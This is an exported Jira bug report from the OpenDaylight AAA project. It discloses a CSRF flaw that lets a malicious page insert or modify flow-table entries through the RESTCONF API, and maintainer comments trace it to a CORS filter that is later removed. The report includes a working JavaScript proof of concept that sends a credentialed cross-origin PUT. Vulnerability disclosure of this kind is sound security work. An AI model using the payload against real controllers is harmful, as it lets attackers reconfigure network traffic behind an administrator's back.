[AAA-197] [CSRF] Attacker can insert or modify the entry of flow table Created: 06/Mar/20  Updated: 06/Jul/22  Resolved: 06/Jul/22

Status: Resolved
Project: aaa
Component/s: General
Affects Version/s: Sodium SR1
Fix Version/s: 0.16.0

Type: Bug Priority: High
Reporter: Seongil Wi Assignee: Robert Varga
Resolution: Duplicate Votes: 0
Labels: None
Remaining Estimate: 4 hours
Time Spent: Not Specified
Original Estimate: 4 hours
Environment:

Browsers Verified In:

  • [Firefox 71.0]

 

Attachments: PNG File 스크린샷 2020-03-06 오후 2.44.48.png    
Issue Links:
Duplicate
duplicates AAA-213 Remove CORS filter from shiro-impl Resolved

 Description   

Brief of this vulnerability

Attacker can insert or modify the entry of flow table. This attack was verified on Sodium-SR1. Although not tested in other versions, it is expected to be applicable.

Description

HI I found csrf bug on flow table inserting and modifying. It can be dangerous for admin. The victim admin can insert the attacker's intended flow into the flow table.

CSRF POC is below : 

<meta charset="utf-8">
<script  src="http://code.jquery.com/jquery-latest.min.js"></script>
 
<script language ="javascript" type = "text/javascript" >
var createCORSRequest = function(method, url) {
  var xhr = new XMLHttpRequest();
  if ("withCredentials" in xhr) {
    // Most browsers.
    xhr.open(method, url, true);
  } else if (typeof XDomainRequest != "undefined") {
    // IE8 & IE9
    xhr = new XDomainRequest();
    xhr.open(method, url);
  } else {
    // CORS not supported.
    xhr = null;
  }
  return xhr;
};
 
var url = 'http://127.0.0.1:8181/restconf/config/opendaylight-inventory:nodes/node/openflow:1/table/0/flow/1';
var method = 'PUT';
var xhr = createCORSRequest(method, url);
 
xhr.onload = function() {
  // Success code goes here.
};
 
xhr.onerror = function() {
  // Error code goes here.
};
 
xhr.setRequestHeader('Content-Type', 'application/xml')
xhr.withCredentials = true;
xhr.send('<?xml version="1.0" encoding="UTF-8" standalone="no"?><flow xmlns="urn:opendaylight:flow:inventory"><priority>4</priority><flow-name>asdfa</flow-name><match><ethernet-match><ethernet-type><type>2048</type></ethernet-type></ethernet-match><ipv4-destination>10.0.0.1/24</ipv4-destination></match><id>1</id><table_id>0</table_id><instructions><instruction><order>0</order><apply-actions><action><order>0</order><dec-nw-ttl/></action></apply-actions></instruction></instructions></flow>');
 
</script>

This attack is an example because ODL itself is vulnerable to CSRF attacks.

In fact, for any function that sets ODL controller using REST API, we can make arbitrary malicious settings using CSRF attack.

If an administrator accesses an arbitrary web page created by an attacker, Floodlight can be configured with arbitrary settings

To Reproduce:

  1. Administrator's benign access
  2. Administrator logged in to the dlux gui via the browser with admin account
  3. Administrator accesses ODL controller using REST API in browser with admin account
  1. Administrator visits the malicious webpage

Solution:

  • Check CSRF tokens in all request.

 Comments   
Comment by Robert Varga [ 23/Apr/20 ]

I think it is AAA's job to secure the HTTP endpoints. Unfortunately I do not remember the details anymore

Comment by Robert Varga [ 23/Apr/20 ]

So if I am reading this correctly, the problem is the CORS filter configuration dating back all the way back to https://git.opendaylight.org/gerrit/c/aaa/+/12533 ... now the next step is to understand the threat model used in those things.

Comment by Robert Varga [ 08/Dec/21 ]

So here I think we need to tighten our policy, but let it still be configurable.

The CORS filter was added to allow easy embedding of RESTCONF requests into portals – which I do not think is being used anymore.

Comment by Robert Varga [ 06/Jul/22 ]

Fixed by removing CORS filter in AAA-213

Generated at Wed Feb 07 19:08:53 UTC 2024 using Jira 8.20.10#820010-sha1:ace47f9899e9ee25d7157d59aa17ab06aee30d3d.